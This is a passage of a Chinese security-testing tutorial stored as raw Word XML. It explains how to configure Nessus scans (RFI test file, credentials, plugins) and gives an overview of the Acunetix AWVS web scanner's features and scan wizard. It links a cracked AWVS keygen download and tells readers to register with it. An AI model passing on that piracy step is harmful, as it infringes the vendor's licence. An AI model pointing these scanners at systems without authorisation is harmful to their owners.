        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2614" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:t>URL for Remote File Inclusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5303" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在远程文件列入 （RFI） 测试时，此选项指定要用于测试的远程主机上的文件。默认情况下，Nessus 将使用 RFI 测试 Tenable 的 web 服务器上承载的安全文件。如果扫描仪不能访问互联网，建议使用一个内部托管的文件用于更精确 RFI 测试。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="502"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2614" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:t>Maximum run time (minutes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5303" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>此选项管理总时间以分钟计算的时间执行 web 应用程序测试。此选项默认值为 5</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>分钟，并适用于所有端口和 Cgi 为给定的 web 站点。扫描本地网络中的小型应用程序的 web 站点会通常完</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>成下一个小时，但是，对于大型应用程序的 web 站点可能需要较高的价值。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7）对于攻击者使用nessus进行目标对象漏洞探测，credentials是不用配置的，但对于安全测试人员想通过nessus深入探测被测系统是否存在漏洞，配置credentials是非常有必要的，有利于nessus扫描仪进入到目标对象的内部进行更深入的扫描。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击credentials——Host配置常用的SSH登陆凭证或者是Windows的登陆凭证，或者是要扫描的目标对象的一切可以登录访问的凭证，配置的方式越多，扫描就会越全面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F74CA55" wp14:editId="2E82E7A3">
            <wp:extent cx="5200153" cy="3314700"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="83" name="图片 83" descr="D:\QQ消息\408122431\Image\C2C\U3LBI1}1RONIQ$VZ4B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QQ消息\408122431\Image\C2C\U3LBI1}1RONIQ$VZ4BN%A`Y.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11165" cy="3321719"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8）然后选择扫描使用的插件。插件是nessus进行漏洞扫描和判断的主要手段，nessus收录了当前已知的大部分漏洞，通过插件脚本定义的规则，对目标系统进行探测，以判断扫描对象是否存在对应的漏洞并在结果报告中给出对应的修复建议。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认是所有的插件都使能的，我们也可以根据需要筛选需要对应的漏洞进行扫描测试。点击</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lugins页面，在右上角区域有过滤搜索栏，点击三角形的下拉框，可以添加过滤规则，多条过滤规则之间可以配置是与或者是或的关系。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EFD1A00" wp14:editId="7EDB5E45">
            <wp:extent cx="5327015" cy="3522428"/>
            <wp:effectExtent l="0" t="0" r="6985" b="1905"/>
            <wp:docPr id="92" name="图片 92" descr="D:\QQ消息\408122431\Image\C2C\T8_FGEP7GM7YFTAJH34@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QQ消息\408122431\Image\C2C\T8_FGEP7GM7YFTAJH34@NCF.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43017" cy="3533009"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9）其他的配置可以保持默认配置即可，最后保存扫描的配置，点击打开</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cans——</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>scans页面，点击对应扫描任务的启动按钮启动扫描，扫描结束后可以直接点击扫描任务查看对应的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00917920">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40BC690A" wp14:editId="171674BC">
            <wp:extent cx="5216055" cy="1577340"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="94" name="图片 94" descr="D:\QQ消息\408122431\Image\C2C\0SQBC9@WXFUUL2$@I04(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QQ消息\408122431\Image\C2C\0SQBC9@WXFUUL2$@I04(X@Q.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56812" cy="1589665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc499884703"/>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AWVS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc499884704"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>概述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Acunetix  Web Vulnerability Scanner（简称AWVS）是一个自动化的Web应用程序安全测试工具，它可以扫描任何遵循HTTP/HTTPS规则的Web站点和Web应用程序。AWVS可以通过网络爬虫、检查SQL注入攻击漏洞、跨站脚本攻击漏洞等来检测Web应用程序的安全性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装下载地址：</w:t>
      </w:r>
      <w:r w:rsidRPr="003E6996">
        <w:t>ftp://10.180.187.2/%B9%A4%BE%DF/ Acunetix_Web_Vulnerability_Scanner_10.x_Consultant_Edition_KeyGen_Hmily[LCG].zip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接下一步安装，安装完用注册机注册下。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="00B22880" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B22880">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>主要功能</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AWVS主要包含一下功能：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WebScanner，核心功能，Web安全漏洞扫描</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Site Crawler，爬虫功能，遍历站点目录结构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Target Finder，端口扫描，找出web服务器，80,443</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Subdomain Scanner，子域名扫描器，利用DNS查询</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Blind SQL Injector，盲注工具</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP Editor，http协议数据包编辑器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP Sniffer，HTTP协议嗅探器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP Fuzzer，模糊测试工具</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Authentication Tester，Web认证破解工具</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="29" w:name="_Toc499884705"/>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web Scanner</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb scanner功能就是对网址进行扫描，从而发现漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.1配置步骤</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击菜单栏的 New Scan 新建扫描， 网站扫描开始前，需要设定一些选项，包括Scan type、option、target、login和finish。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="003E6996">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>can type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选择扫描一个单独web站点，或者导入WVS内置 site crawler的爬行结果，然后进行漏洞扫描。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53890A71" wp14:editId="4B626917">
            <wp:extent cx="5467364" cy="4105275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="96" name="图片 96" descr="C:\Users\hbhang\Documents\Tencent Files\813940732\Image\C2C\$@S82@SAJM_NX8%GW80TA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S82@SAJM_NX8%GW80TAX7.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70153" cy="4107369"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Scan single website：在Website URL处填入需要扫描的网站网址，如果你想要扫描一个单独的应用程序，而不是整个网站，可以在填写网址的地方写入完整路径。WVS支持HTTP/HTTPS网站扫描。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Scan using saved crawling results：导入WVS内置 site crawler的爬行到的结果，然后对爬行的结果进行漏洞扫描。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Access the scheduler interface：如果被扫描的网站构成了一个列表形式(也就是要扫描多个网站的时候)，那么可以使用Acunetix的Scheduler功能完成任务，访问 </w:t>
      </w:r>
      <w:hyperlink r:id="rId220" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="003E6996">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>http://localhost:8183</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，扫描后的文件存放在“C:\Users\Public\Documents\Acunetix WVS 10\Saves”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.2 option</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置侧重扫描的漏洞类型，主要分为两部分:scanning options和crawling options。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1966819B" wp14:editId="0C86E084">
            <wp:extent cx="5086350" cy="3958540"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="97" name="图片 97" descr="C:\Users\hbhang\Documents\Tencent Files\813940732\Image\C2C\QIJTH]CFMD)3T]9HQVD_7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hang\Documents\Tencent Files\813940732\Image\C2C\QIJTH]CFMD)3T]9HQVD_7IR.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88995" cy="3960599"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1）Scanning profile：设置侧重扫描的类型，包含16种侧重检测类型，如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D5FED30" wp14:editId="541B1DFB">
            <wp:extent cx="5274310" cy="3370902"/>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3370902"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2）</w:t>
      </w:r>
      <w:r w:rsidRPr="003E6996">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>can setting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描配置，可定制扫描器扫描选项,AWVS在默认情况下只有“default”默认扫描参数配置策略，点击旁边的Customize则可以自定义配置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F5A1454" wp14:editId="2DCAB4CE">
            <wp:extent cx="5772150" cy="3535773"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="99" name="图片 99" descr="C:\Users\hbhang\Documents\Tencent Files\813940732\Image\C2C\KM7RI8X$S7]R[N{AJU_%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KM7RI8X$S7]R[N{AJU_%XU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72150" cy="3535773"/>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jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1.3 Advanced </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在扫描向导中显示高级扫描设置，如下就是高级选项配置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="548717F4" wp14:editId="5DAED2AA">
            <wp:extent cx="5390862" cy="4181475"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="100" name="图片 100" descr="C:\Users\hbhang\Documents\Tencent Files\813940732\Image\C2C\T@MM[7M(ZMF0JAEXMJROB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T@MM[7M(ZMF0JAEXMJROBZM.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0862" cy="4181475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>After crawling let me choose the files to scan：在爬行结果之后选择我们需要扫描哪些文件。</w:t>
      </w:r>
    </w:p>
